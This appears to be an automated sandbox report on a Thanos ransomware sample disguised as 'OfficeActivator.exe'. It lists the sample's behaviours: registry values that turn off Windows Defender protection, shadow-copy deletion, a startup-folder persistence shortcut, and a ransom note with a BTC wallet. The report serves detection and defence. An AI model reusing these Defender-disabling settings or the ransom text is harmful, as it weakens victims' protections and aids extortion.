Malware Analysis Report

2024-11-13 15:33

Sample ID 241108-v1g32awdld
Target https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A
Tags
thanos defense_evasion discovery evasion execution impact persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A was found to be: Known bad.

Malicious Activity Summary

thanos defense_evasion discovery evasion execution impact persistence ransomware trojan

Disables service(s)

Thanos family

Thanos Ransomware

Thanos executable

Modifies Windows Defender Real-time Protection settings

Contains code to disable Windows Defender

Deletes shadow copies

Renames multiple (52) files with added filename extension

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Drops startup file

Windows security modification

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

Launches sc.exe

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Kills process with taskkill

NTFS ADS

Suspicious use of FindShellTrayWindow

Interacts with shadow copies

Runs net.exe

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 17:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 17:27

Reported

2024-11-08 17:28

Platform

win10v2004-20241007-en

Max time kernel

78s

Max time network

85s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Thanos Ransomware

ransomware thanos

Thanos executable

Description Indicator Process Target
N/A N/A N/A N/A

Thanos family

thanos

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (52) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\arp.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 149254.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
